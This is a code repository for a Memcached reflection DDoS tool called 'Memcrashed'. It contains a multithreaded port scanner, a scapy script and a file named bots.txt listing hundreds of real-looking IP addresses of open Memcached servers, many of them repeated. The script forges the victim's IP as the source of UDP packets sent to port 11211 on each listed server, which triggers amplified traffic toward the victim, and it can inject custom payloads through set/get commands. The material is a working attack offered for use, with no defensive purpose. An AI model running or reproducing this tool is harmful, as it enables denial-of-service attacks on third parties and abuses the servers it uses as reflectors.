├── memlogo.png ├── requirements.txt ├── README.md ├── portscanner.py ├── memcrashed.py ├── bots.txt └── LICENSE.md /memlogo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/add1ct3d/Memcrashed-DDoS-Exploit-Free/HEAD/memlogo.png -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2018.4.16 2 | chardet==3.0.4 3 | click==6.7 4 | click-plugins==1.0.3 5 | colorama==0.3.9 6 | idna==2.6 7 | requests==2.18.4 8 | scapy==2.4.0 9 | shodan==1.7.7 10 | urllib3==1.22 11 | XlsxWriter==1.0.4 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MEMCRASHED DDOS EXPLOIT TOOL FREE 2 | 3 | * Author: [@R00TS3C](https://github.com/R00tS3c) 4 | 5 | This tool allows you to send forged UDP packets to Memcached servers obtained from scanner 6 | ### Prerequisites 7 | 8 | The only thing you need installed is Python 3.x 9 | 10 | ``` 11 | apt-get install python3 12 | ``` 13 | 14 | ``` 15 | pip install -r requirements.txt 16 | ``` 17 | ----------------------------------------- 18 | 19 | # CONTACT US: 20 | 21 | RootSec HUB: 22 | https://r00ts3c.github.io/ 23 | 24 | Discord: 25 | https://discord.gg/G6tfGDD 26 | ----------------------------------------- 27 | -------------------------------------------------------------------------------- /portscanner.py: -------------------------------------------------------------------------------- 1 | # This script runs on Python 3 2 | #ROOTSEC 3 | #HUB: https://r00ts3c.github.io/ 4 | #DISCORD: https://discord.gg/G6tfGDD 5 | import socket, threading 6 | import sys 7 | import logging 8 | def TCP_connect(ip, port_number, delay, output): 9 | TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 10 | TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 11 | TCPsock.settimeout(delay) 12 | try: 13 | TCPsock.connect((ip, port_number)) 14 | output[port_number] = 'Listening' 15 | except: 16 | output[port_number] = '' 17 | 18 | 19 | 20 | def scan_ports(host_ip, delay): 21 | 22 | threads = [] # To run TCP_connect concurrently 23 | output = {} # For printing purposes 24 | 25 | # Spawning threads to scan ports 26 | logging.debug('appending threads') 27 | for i in range(500): 28 | 29 | t = threading.Thread(target=TCP_connect, args=(host_ip, i, delay, output)) 30 | threads.append(t) 31 | 32 | # Starting threads 33 | logging.debug('finished appending') 34 | for i in range(500): 35 | try: 36 | logging.debug('starting thread %s', threads[i]) 37 | threads[i].start() 38 | except RuntimeError: 39 | print("Run time error:", sys.exc_info()[0]) 40 | raise 41 | 42 | # Locking the script until all threads complete 43 | for i in range(500): 44 | threads[i].join() 45 | 46 | # Printing listening ports from small to large 47 | for i in range(500): 48 | if output[i] == 'Listening': 49 | print(str(i) + ': ' + output[i]) 50 | 51 | logging.basicConfig( 52 | level=logging.DEBUG, 53 | format='[%(levelname)s] (%(threadName)-10s) %(message)s',) 54 | 55 | def run(target): 56 | host_ip = target 57 | delay = int(input("How many seconds the socket is going to wait until timeout: ")) 58 | print(target) 59 | scan_ports(host_ip, delay) 60 | 61 | 62 | def main(): 63 | 64 | host_ip = input("Enter host IP: ") 65 | delay = int(input("How many seconds the socket is going to wait until timeout: ")) 66 | scan_ports(host_ip, delay) 67 | 68 | if __name__ == "__main__": 69 | main() 70 | -------------------------------------------------------------------------------- /memcrashed.py: -------------------------------------------------------------------------------- 1 | #-- coding: utf8 -- 2 | #!/usr/bin/python 3 | #ROOTSEC 4 | #HUB: https://r00ts3c.github.io/ 5 | #DISCORD: https://discord.gg/G6tfGDD 6 | import sys, os, time, shodan 7 | import logging 8 | logging.getLogger("scapy3k.runtime").setLevel(logging.ERROR) ##removes the ipv6 warning 9 | from pathlib import Path 10 | from scapy.all import * ##please change it to from scapy3k.all import * if giving error 11 | from contextlib import contextmanager 12 | 13 | starttime=time.time() 14 | 15 | #@contextmanager 16 | #def suppress_stdout(): 17 | # with open(os.devnull, "w") as devnull: 18 | # old_stdout = sys.stdout 19 | # sys.stdout = devnull 20 | # try: 21 | # yield 22 | # finally: 23 | # sys.stdout = old_stdout 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | def memcrash(target): 32 | print(target) 33 | 34 | 35 | while True: 36 | print('') 37 | try: 38 | myresults = Path("./bots.txt") ##removed api entry and api check 39 | query = 'y' 40 | saveme = 'y' 41 | if myresults.is_file(): 42 | 43 | ip_arrayn = [] 44 | with open('bots.txt') as my_file: ##uses pre-saved bots.txt 45 | for line in my_file: 46 | ip_arrayn.append(line) 47 | ip_array = [s.rstrip() for s in ip_arrayn] 48 | else: 49 | print('') 50 | print('[✘] Error: No bots stored locally, bots.txt file not found!') 51 | print('') 52 | if saveme.startswith('y') or query.startswith('y'): 53 | print('') 54 | target = input("[▸] Press enter: ") 55 | targetport = input("[▸] Enter target port number (Default 80): ") or "80" 56 | power = int(input("[▸] Enter preferred power (Default 1): ") or "1") 57 | print('') 58 | data = input("[] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" 59 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 60 | dataset = "set injected 0 3600 ", len(data)+1, "\r\n", data, "\r\n get injected\r\n" 61 | setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n" % (len(data)+1, data)) 62 | getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n") 63 | print("[] Payload transformed: ", dataset) 64 | print('') 65 | ##removed show bots list 66 | engage = input('[*] Ready to engage target %s? : ' % target).lower() 67 | if engage.startswith('y'): 68 | if saveme.startswith('y'): 69 | for i in ip_array: 70 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 71 | print('[] Sending 2 forged synchronized payloads to: %s' % (i)) 72 | # with True: 73 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1) 74 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power) 75 | else: 76 | if power>1: 77 | print('[] Sending %d forged UDP packets to: %s' % (power, i)) 78 | #with suppress_stdout(): 79 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 80 | elif power==1: 81 | print('[] Sending 1 forged UDP packet to: %s' % i) 82 | 83 | send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 84 | else: 85 | for result in results['matches']: 86 | if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"): 87 | print('[] Sending 2 forged synchronized payloads to: %s' % (i)) 88 | #with suppress_stdout(): 89 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1) 90 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power) 91 | else: 92 | if power>1: 93 | print('[] Sending %d forged UDP packets to: %s' % (power, result['ip_str'])) 94 | #with suppress_stdout(): 95 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 96 | elif power==1: 97 | print('[] Sending 1 forged UDP packet to: %s' % result['ip_str']) 98 | #with suppress_stdout(): 99 | send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) 100 | print('') 101 | print('[•] Task complete! Exiting Platform. Have a wonderful day.') 102 | break 103 | else: 104 | print('') 105 | print('[✘] Error: %s not engaged!' % target) 106 | print('[~] Restarting Platform! Please wait.') 107 | print('') 108 | else: 109 | print('') 110 | print('[✘] Error: No bots stored locally') 111 | print('[~] Restarting Platform! Please wait.') 112 | print('') 113 | except shodan.APIError as e: 114 | print('[x] Exiting') 115 | 116 | def run(target): 117 | targ=target 118 | print(target) 119 | memcrash(target) 120 | def main(): 121 | 122 | host_ip = input("IP: ") 123 | 124 | memcrash(host_ip) 125 | 126 | if __name__ == "__main__": 127 | main() 128 | -------------------------------------------------------------------------------- /bots.txt: -------------------------------------------------------------------------------- 1 | 185.87.120.65 2 | 139.162.82.171 3 | 27.124.94.86 4 | 186.46.187.19 5 | 123.206.73.58 6 | 182.92.96.224 7 | 23.88.82.221 8 | 153.121.34.25 9 | 173.199.153.209 10 | 200.111.46.19 11 | 92.63.105.222 12 | 54.193.101.210 13 | 66.39.116.44 14 | 120.27.9.36 15 | 95.183.48.75 16 | 1.9.70.114 17 | 181.198.13.62 18 | 121.40.135.20 19 | 204.14.29.155 20 | 39.107.102.70 21 | 66.220.11.154 22 | 103.234.37.24 23 | 114.215.188.200 24 | 113.72.123.240 25 | 216.92.184.147 26 | 77.81.108.148 27 | 190.111.252.242 28 | 160.19.50.85 29 | 86.104.177.115 30 | 23.225.89.193 31 | 37.59.213.84 32 | 78.11.49.219 33 | 209.126.112.99 34 | 120.27.42.81 35 | 23.88.82.131 36 | 23.229.227.185 37 | 120.24.248.218 38 | 151.248.121.69 39 | 47.94.252.84 40 | 185.38.45.101 41 | 45.126.133.39 42 | 172.247.51.159 43 | 195.211.102.45 44 | 45.114.94.100 45 | 94.23.28.120 46 | 139.196.4.23 47 | 185.181.231.3 48 | 45.114.94.199 49 | 5.189.155.110 50 | 42.112.26.23 51 | 85.214.196.102 52 | 138.201.142.161 53 | 59.153.61.173 54 | 128.1.182.101 55 | 5.79.19.231 56 | 62.109.28.66 57 | 23.225.89.228 58 | 118.184.40.160 59 | 47.97.11.85 60 | 104.224.200.249 61 | 58.87.74.97 62 | 188.42.219.152 63 | 216.92.219.101 64 | 151.80.81.126 65 | 27.254.48.159 66 | 66.39.103.23 67 | 77.235.58.46 68 | 121.40.155.156 69 | 23.104.135.85 70 | 47.90.53.156 71 | 157.7.134.40 72 | 109.169.76.32 73 | 96.126.107.197 74 | 125.212.228.74 75 | 218.58.210.227 76 | 23.244.241.215 77 | 211.147.242.10 78 | 5.189.178.52 79 | 23.253.17.99 80 | 203.150.47.67 81 | 89.108.93.46 82 | 198.200.41.107 83 | 52.205.233.219 84 | 49.212.143.140 85 | 45.114.117.117 86 | 216.92.236.69 87 | 77.223.142.79 88 | 144.217.15.159 89 | 5.160.219.61 90 | 103.195.187.243 91 | 199.96.214.92 92 | 216.38.59.73 93 | 65.18.120.20 94 | 139.162.197.206 95 | 64.131.79.224 96 | 23.229.227.175 97 | 124.173.114.41 98 | 59.153.61.176 99 | 118.89.26.109 100 | 139.196.197.228 101 | 185.87.120.65 102 | 139.162.82.171 103 | 27.124.94.86 104 | 186.46.187.19 105 | 123.206.73.58 106 | 182.92.96.224 107 | 23.88.82.221 108 | 153.121.34.25 109 | 173.199.153.209 110 | 200.111.46.19 111 | 92.63.105.222 112 | 54.193.101.210 113 | 66.39.116.44 114 | 120.27.9.36 115 | 95.183.48.75 116 | 1.9.70.114 117 | 181.198.13.62 118 | 121.40.135.20 119 | 204.14.29.155 120 | 39.107.102.70 121 | 66.220.11.154 122 | 103.234.37.24 123 | 114.215.188.200 124 | 113.72.123.240 125 | 216.92.184.147 126 | 77.81.108.148 127 | 190.111.252.242 128 | 160.19.50.85 129 | 86.104.177.115 130 | 23.225.89.193 131 | 37.59.213.84 132 | 78.11.49.219 133 | 209.126.112.99 134 | 120.27.42.81 135 | 23.88.82.131 136 | 23.229.227.185 137 | 120.24.248.218 138 | 151.248.121.69 139 | 47.94.252.84 140 | 185.38.45.101 141 | 45.126.133.39 142 | 172.247.51.159 143 | 195.211.102.45 144 | 45.114.94.100 145 | 94.23.28.120 146 | 139.196.4.23 147 | 185.181.231.3 148 | 45.114.94.199 149 | 5.189.155.110 150 | 42.112.26.23 151 | 85.214.196.102 152 | 138.201.142.161 153 | 59.153.61.173 154 | 128.1.182.101 155 | 5.79.19.231 156 | 62.109.28.66 157 | 23.225.89.228 158 | 118.184.40.160 159 | 47.97.11.85 160 | 104.224.200.249 161 | 58.87.74.97 162 | 188.42.219.152 163 | 216.92.219.101 164 | 151.80.81.126 165 | 27.254.48.159 166 | 66.39.103.23 167 | 77.235.58.46 168 | 121.40.155.156 169 | 23.104.135.85 170 | 47.90.53.156 171 | 157.7.134.40 172 | 109.169.76.32 173 | 96.126.107.197 174 | 125.212.228.74 175 | 218.58.210.227 176 | 23.244.241.215 177 | 211.147.242.10 178 | 5.189.178.52 179 | 23.253.17.99 180 | 203.150.47.67 181 | 89.108.93.46 182 | 198.200.41.107 183 | 52.205.233.219 184 | 49.212.143.140 185 | 45.114.117.117 186 | 216.92.236.69 187 | 77.223.142.79 188 | 144.217.15.159 189 | 5.160.219.61 190 | 103.195.187.243 191 | 199.96.214.92 192 | 216.38.59.73 193 | 65.18.120.20 194 | 139.162.197.206 195 | 64.131.79.224 196 | 23.229.227.175 197 | 124.173.114.41 198 | 59.153.61.176 199 | 118.89.26.109 200 | 139.196.197.228 201 | 185.87.120.65 202 | 139.162.82.171 203 | 27.124.94.86 204 | 186.46.187.19 205 | 123.206.73.58 206 | 182.92.96.224 207 | 23.88.82.221 208 | 153.121.34.25 209 | 173.199.153.209 210 | 200.111.46.19 211 | 92.63.105.222 212 | 54.193.101.210 213 | 66.39.116.44 214 | 120.27.9.36 215 | 95.183.48.75 216 | 1.9.70.114 217 | 181.198.13.62 218 | 121.40.135.20 219 | 204.14.29.155 220 | 39.107.102.70 221 | 66.220.11.154 222 | 103.234.37.24 223 | 114.215.188.200 224 | 113.72.123.240 225 | 216.92.184.147 226 | 77.81.108.148 227 | 190.111.252.242 228 | 160.19.50.85 229 | 86.104.177.115 230 | 23.225.89.193 231 | 37.59.213.84 232 | 78.11.49.219 233 | 209.126.112.99 234 | 120.27.42.81 235 | 23.88.82.131 236 | 23.229.227.185 237 | 120.24.248.218 238 | 151.248.121.69 239 | 47.94.252.84 240 | 185.38.45.101 241 | 45.126.133.39 242 | 172.247.51.159 243 | 195.211.102.45 244 | 45.114.94.100 245 | 94.23.28.120 246 | 139.196.4.23 247 | 185.181.231.3 248 | 45.114.94.199 249 | 5.189.155.110 250 | 42.112.26.23 251 | 85.214.196.102 252 | 138.201.142.161 253 | 59.153.61.173 254 | 128.1.182.101 255 | 5.79.19.231 256 | 62.109.28.66 257 | 23.225.89.228 258 | 118.184.40.160 259 | 47.97.11.85 260 | 104.224.200.249 261 | 58.87.74.97 262 | 188.42.219.152 263 | 216.92.219.101 264 | 151.80.81.126 265 | 27.254.48.159 266 | 66.39.103.23 267 | 77.235.58.46 268 | 121.40.155.156 269 | 23.104.135.85 270 | 47.90.53.156 271 | 157.7.134.40 272 | 109.169.76.32 273 | 96.126.107.197 274 | 125.212.228.74 275 | 218.58.210.227 276 | 23.244.241.215 277 | 211.147.242.10 278 | 5.189.178.52 279 | 23.253.17.99 280 | 203.150.47.67 281 | 89.108.93.46 282 | 198.200.41.107 283 | 52.205.233.219 284 | 49.212.143.140 285 | 45.114.117.117 286 | 216.92.236.69 287 | 77.223.142.79 288 | 144.217.15.159 289 | 5.160.219.61 290 | 103.195.187.243 291 | 199.96.214.92 292 | 216.38.59.73 293 | 65.18.120.20 294 | 139.162.197.206 295 | 64.131.79.224 296 | 23.229.227.175 297 | 124.173.114.41 298 | 59.153.61.176 299 | 118.89.26.109 300 | 139.196.197.228 301 | 185.87.120.65 302 | 139.162.82.171 303 | 27.124.94.86 304 | 186.46.187.19 305 | 123.206.73.58 306 | 182.92.96.224 307 | 23.88.82.221 308 | 153.121.34.25 309 | 173.199.153.209 310 | 200.111.46.19 311 | 92.63.105.222 312 | 54.193.101.210 313 | 66.39.116.44 314 | 120.27.9.36 315 | 95.183.48.75 316 | 1.9.70.114 317 | 181.198.13.62 318 | 121.40.135.20 319 | 204.14.29.155 320 | 39.107.102.70 321 | 66.220.11.154 322 | 103.234.37.24 323 | 114.215.188.200 324 | 113.72.123.240 325 | 216.92.184.147 326 | 77.81.108.148 327 | 190.111.252.242 328 | 160.19.50.85 329 | 86.104.177.115 330 | 23.225.89.193 331 | 37.59.213.84 332 | 78.11.49.219 333 | 209.126.112.99 334 | 120.27.42.81 335 | 23.88.82.131 336 | 23.229.227.185 337 | 120.24.248.218 338 | 151.248.121.69 339 | 47.94.252.84 340 | 185.38.45.101 341 | 45.126.133.39 342 | 172.247.51.159 343 | 195.211.102.45 344 | 45.114.94.100 345 | 94.23.28.120 346 | 139.196.4.23 347 | 185.181.231.3 348 | 45.114.94.199 349 | 5.189.155.110 350 | 42.112.26.23 351 | 85.214.196.102 352 | 138.201.142.161 353 | 59.153.61.173 354 | 128.1.182.101 355 | 5.79.19.231 356 | 62.109.28.66 357 | 23.225.89.228 358 | 118.184.40.160 359 | 47.97.11.85 360 | 104.224.200.249 361 | 58.87.74.97 362 | 188.42.219.152 363 | 216.92.219.101 364 | 151.80.81.126 365 | 27.254.48.159 366 | 66.39.103.23 367 | 77.235.58.46 368 | 121.40.155.156 369 | 23.104.135.85 370 | 47.90.53.156 371 | 157.7.134.40 372 | 109.169.76.32 373 | 96.126.107.197 374 | 125.212.228.74 375 | 218.58.210.227 376 | 23.244.241.215 377 | 211.147.242.10 378 | 5.189.178.52 379 | 23.253.17.99 380 | 203.150.47.67 381 | 89.108.93.46 382 | 198.200.41.107 383 | 52.205.233.219 384 | 49.212.143.140 385 | 45.114.117.117 386 | 216.92.236.69 387 | 77.223.142.79 388 | 144.217.15.159 389 | 5.160.219.61 390 | 103.195.187.243 391 | 199.96.214.92 392 | 216.38.59.73 393 | 65.18.120.20 394 | 139.162.197.206 395 | 64.131.79.224 396 | 23.229.227.175 397 | 124.173.114.41 398 | 59.153.61.176 399 | 118.89.26.109 400 | 139.196.197.228 401 | 43.230.200.26 402 | 212.96.127.228 403 | 166.63.21.4 404 | 188.93.232.16 405 | 193.136.42.140 406 | 198.58.107.33 407 | 198.200.41.86 408 | 13.114.171.179 409 | 46.37.185.231 410 | 210.51.191.73 411 | 185.98.63.132 412 | 222.255.122.168 413 | 182.61.107.182 414 | 62.220.134.49 415 | 198.200.41.93 416 | 173.212.205.148 417 | 118.244.214.182 418 | 142.4.119.65 419 | 123.207.41.72 420 | 47.91.109.31 421 | 103.16.143.166 422 | 216.92.138.42 423 | 45.32.32.182 424 | 38.117.76.26 425 | 180.150.249.88 426 | 216.131.116.73 427 | 118.193.234.27 428 | 58.138.174.221 429 | 23.225.89.186 430 | 124.131.31.232 431 | 75.103.109.192 432 | 119.27.185.22 433 | 120.77.49.163 434 | 190.0.64.37 435 | 187.188.168.201 436 | 148.100.98.159 437 | 94.23.144.45 438 | 43.230.201.89 439 | 209.141.45.250 440 | 47.52.43.233 441 | 179.43.152.36 442 | 213.197.140.90 443 | 133.186.135.73 444 | 121.41.13.126 445 | 61.90.198.151 446 | 82.146.44.65 447 | 185.5.53.187 448 | 118.70.81.17 449 | 124.128.12.164 450 | 180.168.26.98 451 | 103.75.177.80 452 | 72.52.169.165 453 | 77.87.208.19 454 | 210.209.70.68 455 | 45.76.150.21 456 | 69.64.73.168 457 | 74.91.113.153 458 | 52.36.225.72 459 | 182.16.93.43 460 | 37.48.77.108 461 | 199.182.173.14 462 | 61.191.49.185 463 | 120.27.48.56 464 | 46.105.172.243 465 | 216.92.214.26 466 | 34.217.81.143 467 | 23.244.214.50 468 | 54.67.69.230 469 | 45.61.115.52 470 | 172.247.114.9 471 | 45.79.184.204 472 | 104.203.82.163 473 | 203.174.76.207 474 | 165.225.151.116 475 | 88.81.254.77 476 | 185.29.122.103 477 | 103.48.80.245 478 | 183.157.161.173 479 | 117.48.209.107 480 | 66.128.60.254 481 | 209.239.115.167 482 | 94.130.125.29 483 | 69.36.172.238 484 | 94.138.214.194 485 | 116.7.250.58 486 | 212.24.99.148 487 | 216.92.153.65 488 | 112.74.82.159 489 | 192.81.132.162 490 | 118.193.205.195 491 | 119.29.187.189 492 | 94.23.78.243 493 | 210.248.158.36 494 | 173.245.89.203 495 | 49.212.204.170 496 | 172.246.132.229 497 | 156.234.64.159 498 | 54.191.44.174 499 | 107.180.79.156 500 | 23.225.89.156 501 | 43.230.200.26 502 | 212.96.127.228 503 | 166.63.21.4 504 | 188.93.232.16 505 | 193.136.42.140 506 | 198.58.107.33 507 | 198.200.41.86 508 | 13.114.171.179 509 | 46.37.185.231 510 | 210.51.191.73 511 | 185.98.63.132 512 | 222.255.122.168 513 | 182.61.107.182 514 | 62.220.134.49 515 | 198.200.41.93 516 | 173.212.205.148 517 | 118.244.214.182 518 | 142.4.119.65 519 | 123.207.41.72 520 | 47.91.109.31 521 | 103.16.143.166 522 | 216.92.138.42 523 | 45.32.32.182 524 | 38.117.76.26 525 | 180.150.249.88 526 | 216.131.116.73 527 | 118.193.234.27 528 | 58.138.174.221 529 | 23.225.89.186 530 | 124.131.31.232 531 | 75.103.109.192 532 | 119.27.185.22 533 | 120.77.49.163 534 | 190.0.64.37 535 | 187.188.168.201 536 | 148.100.98.159 537 | 94.23.144.45 538 | 43.230.201.89 539 | 209.141.45.250 540 | 47.52.43.233 541 | 179.43.152.36 542 | 213.197.140.90 543 | 133.186.135.73 544 | 121.41.13.126 545 | 61.90.198.151 546 | 82.146.44.65 547 | 185.5.53.187 548 | 118.70.81.17 549 | 124.128.12.164 550 | 180.168.26.98 551 | 103.75.177.80 552 | 72.52.169.165 553 | 77.87.208.19 554 | 210.209.70.68 555 | 45.76.150.21 556 | 69.64.73.168 557 | 74.91.113.153 558 | 52.36.225.72 559 | 182.16.93.43 560 | 37.48.77.108 561 | 199.182.173.14 562 | 61.191.49.185 563 | 120.27.48.56 564 | 46.105.172.243 565 | 216.92.214.26 566 | 34.217.81.143 567 | 23.244.214.50 568 | 54.67.69.230 569 | 45.61.115.52 570 | 172.247.114.9 571 | 45.79.184.204 572 | 104.203.82.163 573 | 203.174.76.207 574 | 165.225.151.116 575 | 88.81.254.77 576 | 185.29.122.103 577 | 103.48.80.245 578 | 183.157.161.173 579 | 117.48.209.107 580 | 66.128.60.254 581 | 209.239.115.167 582 | 94.130.125.29 583 | 69.36.172.238 584 | 94.138.214.194 585 | 116.7.250.58 586 | 212.24.99.148 587 | 216.92.153.65 588 | 112.74.82.159 589 | 192.81.132.162 590 | 118.193.205.195 591 | 119.29.187.189 592 | 94.23.78.243 593 | 210.248.158.36 594 | 173.245.89.203 595 | 49.212.204.170 596 | 172.246.132.229 597 | 156.234.64.159 598 | 54.191.44.174 599 | 107.180.79.156 600 | 23.225.89.156 601 | 43.230.200.26 602 | 212.96.127.228 603 | 166.63.21.4 604 | 188.93.232.16 605 | 193.136.42.140 606 | 198.58.107.33 607 | 198.200.41.86 608 | 13.114.171.179 609 | 46.37.185.231 610 | 210.51.191.73 611 | 185.98.63.132 612 | 222.255.122.168 613 | 182.61.107.182 614 | 62.220.134.49 615 | 198.200.41.93 616 | 173.212.205.148 617 | 118.244.214.182 618 | 142.4.119.65 619 | 123.207.41.72 620 | 47.91.109.31 621 | 103.16.143.166 622 | 216.92.138.42 623 | 45.32.32.182 624 | 38.117.76.26 625 | 180.150.249.88 626 | 216.131.116.73 627 | 118.193.234.27 628 | 58.138.174.221 629 | 23.225.89.186 630 | 124.131.31.232 631 | 75.103.109.192 632 | 119.27.185.22 633 | 120.77.49.163 634 | 190.0.64.37 635 | 187.188.168.201 636 | 148.100.98.159 637 | 94.23.144.45 638 | 43.230.201.89 639 | 209.141.45.250 640 | 47.52.43.233 641 | 179.43.152.36 642 | 213.197.140.90 643 | 133.186.135.73 644 | 121.41.13.126 645 | 61.90.198.151 646 | 82.146.44.65 647 | 185.5.53.187 648 | 118.70.81.17 649 | 124.128.12.164 650 | 180.168.26.98 651 | 103.75.177.80 652 | 72.52.169.165 653 | 77.87.208.19 654 | 210.209.70.68 655 | 45.76.150.21 656 | 69.64.73.168 657 | 74.91.113.153 658 | 52.36.225.72 659 | 182.16.93.43 660 | 37.48.77.108 661 | 199.182.173.14 662 | 61.191.49.185 663 | 120.27.48.56 664 | 46.105.172.243 665 | 216.92.214.26 666 | 34.217.81.143 667 | 23.244.214.50 668 | 54.67.69.230 669 | 45.61.115.52 670 | 172.247.114.9 671 | 45.79.184.204 672 | 104.203.82.163 673 | 203.174.76.207 674 | 165.225.151.116 675 | 88.81.254.77 676 | 185.29.122.103 677 | 103.48.80.245 678 | 183.157.161.173 679 | 117.48.209.107 680 | 66.128.60.254 681 | 209.239.115.167 682 | 94.130.125.29 683 | 69.36.172.238 684 | 94.138.214.194 685 | 116.7.250.58 686 | 212.24.99.148 687 | 216.92.153.65 688 | 112.74.82.159 689 | 192.81.132.162 690 | 118.193.205.195 691 | 119.29.187.189 692 | 94.23.78.243 693 | 210.248.158.36 694 | 173.245.89.203 695 | 49.212.204.170 696 | 172.246.132.229 697 | 156.234.64.159 698 | 54.191.44.174 699 | 107.180.79.156 700 | 23.225.89.156 701 | 43.230.200.26 702 | 212.96.127.228 703 | 166.63.21.4 704 | 188.93.232.16 705 | 193.136.42.140 706 | 198.58.107.33 707 | 198.200.41.86 708 | 13.114.171.179 709 | 46.37.185.231 710 | 210.51.191.73 711 | 185.98.63.132 712 | 222.255.122.168 713 | 182.61.107.182 714 | 62.220.134.49 715 | 198.200.41.93 716 | 173.212.205.148 717 | 118.244.214.182 718 | 142.4.119.65 719 | 123.207.41.72 720 | 47.91.109.31 721 | 103.16.143.166 722 | 216.92.138.42 723 | 45.32.32.182 724 | 38.117.76.26 725 | 180.150.249.88 726 | 216.131.116.73 727 | 118.193.234.27 728 | 58.138.174.221 729 | 23.225.89.186 730 | 124.131.31.232 731 | 75.103.109.192 732 | 119.27.185.22 733 | 120.77.49.163 734 | 190.0.64.37 735 | 187.188.168.201 736 | 148.100.98.159 737 | 94.23.144.45 738 | 43.230.201.89 739 | 209.141.45.250 740 | 47.52.43.233 741 | 179.43.152.36 742 | 213.197.140.90 743 | 133.186.135.73 744 | 121.41.13.126 745 | 61.90.198.151 746 | 82.146.44.65 747 | 185.5.53.187 748 | 118.70.81.17 749 | 124.128.12.164 750 | 180.168.26.98 751 | 103.75.177.80 752 | 72.52.169.165 753 | 77.87.208.19 754 | 210.209.70.68 755 | 45.76.150.21 756 | 69.64.73.168 757 | 74.91.113.153 758 | 52.36.225.72 759 | 182.16.93.43 760 | 37.48.77.108 761 | 199.182.173.14 762 | 61.191.49.185 763 | 120.27.48.56 764 | 46.105.172.243 765 | 216.92.214.26 766 | 34.217.81.143 767 | 23.244.214.50 768 | 54.67.69.230 769 | 45.61.115.52 770 | 172.247.114.9 771 | 45.79.184.204 772 | 104.203.82.163 773 | 203.174.76.207 774 | 165.225.151.116 775 | 88.81.254.77 776 | 185.29.122.103 777 | 103.48.80.245 778 | 183.157.161.173 779 | 117.48.209.107 780 | 66.128.60.254 781 | 209.239.115.167 782 | 94.130.125.29 783 | 69.36.172.238 784 | 94.138.214.194 785 | 116.7.250.58 786 | 212.24.99.148 787 | 216.92.153.65 788 | 112.74.82.159 789 | 192.81.132.162 790 | 118.193.205.195 791 | 119.29.187.189 792 | 94.23.78.243 793 | 210.248.158.36 794 | 173.245.89.203 795 | 49.212.204.170 796 | 172.246.132.229 797 | 156.234.64.159 798 | 54.191.44.174 799 | 107.180.79.156 800 | 23.225.89.156 801 | 43.230.200.26 802 | 212.96.127.228 803 | 166.63.21.4 804 | 188.93.232.16 805 | 193.136.42.140 806 | 198.58.107.33 807 | 198.200.41.86 808 | 13.114.171.179 809 | 46.37.185.231 810 | 210.51.191.73 811 | 185.98.63.132 812 | 222.255.122.168 813 | 182.61.107.182 814 | 62.220.134.49 815 | 198.200.41.93 816 | 173.212.205.148 817 | 118.244.214.182 818 | 142.4.119.65 819 | 123.207.41.72 820 | 47.91.109.31 821 | 103.16.143.166 822 | 216.92.138.42 823 | 45.32.32.182 824 | 38.117.76.26 825 | 180.150.249.88 826 | 216.131.116.73 827 | 118.193.234.27 828 | 58.138.174.221 829 | 23.225.89.186 830 | 124.131.31.232 831 | 75.103.109.192 832 | 119.27.185.22 833 | 120.77.49.163 834 | 190.0.64.37 835 | 187.188.168.201 836 | 148.100.98.159 837 | 94.23.144.45 838 | 43.230.201.89 839 | 209.141.45.250 840 | 47.52.43.233 841 | 179.43.152.36 842 | 213.197.140.90 843 | 133.186.135.73 844 | 121.41.13.126 845 | 61.90.198.151 846 | 82.146.44.65 847 | 185.5.53.187 848 | 118.70.81.17 849 | 124.128.12.164 850 | 180.168.26.98 851 | 103.75.177.80 852 | 72.52.169.165 853 | 77.87.208.19 854 | 210.209.70.68 855 | 45.76.150.21 856 | 69.64.73.168 857 | 74.91.113.153 858 | 52.36.225.72 859 | 182.16.93.43 860 | 37.48.77.108 861 | 199.182.173.14 862 | 61.191.49.185 863 | 120.27.48.56 864 | 46.105.172.243 865 | 216.92.214.26 866 | 34.217.81.143 867 | 23.244.214.50 868 | 54.67.69.230 869 | 45.61.115.52 870 | 172.247.114.9 871 | 45.79.184.204 872 | 104.203.82.163 873 | 203.174.76.207 874 | 165.225.151.116 875 | 88.81.254.77 876 | 185.29.122.103 877 | 103.48.80.245 878 | 183.157.161.173 879 | 117.48.209.107 880 | 66.128.60.254 881 | 209.239.115.167 882 | 94.130.125.29 883 | 69.36.172.238 884 | 94.138.214.194 885 | 116.7.250.58 886 | 212.24.99.148 887 | 216.92.153.65 888 | 112.74.82.159 889 | 192.81.132.162 890 | 118.193.205.195 891 | 119.29.187.189 892 | 94.23.78.243 893 | 210.248.158.36 894 | 173.245.89.203 895 | 49.212.204.170 896 | 172.246.132.229 897 | 156.234.64.159 898 | 54.191.44.174 899 | 107.180.79.156 900 | 23.225.89.156 901 | 43.230.200.26 902 | 212.96.127.228 903 | 166.63.21.4 904 | 188.93.232.16 905 | 193.136.42.140 906 | 198.58.107.33 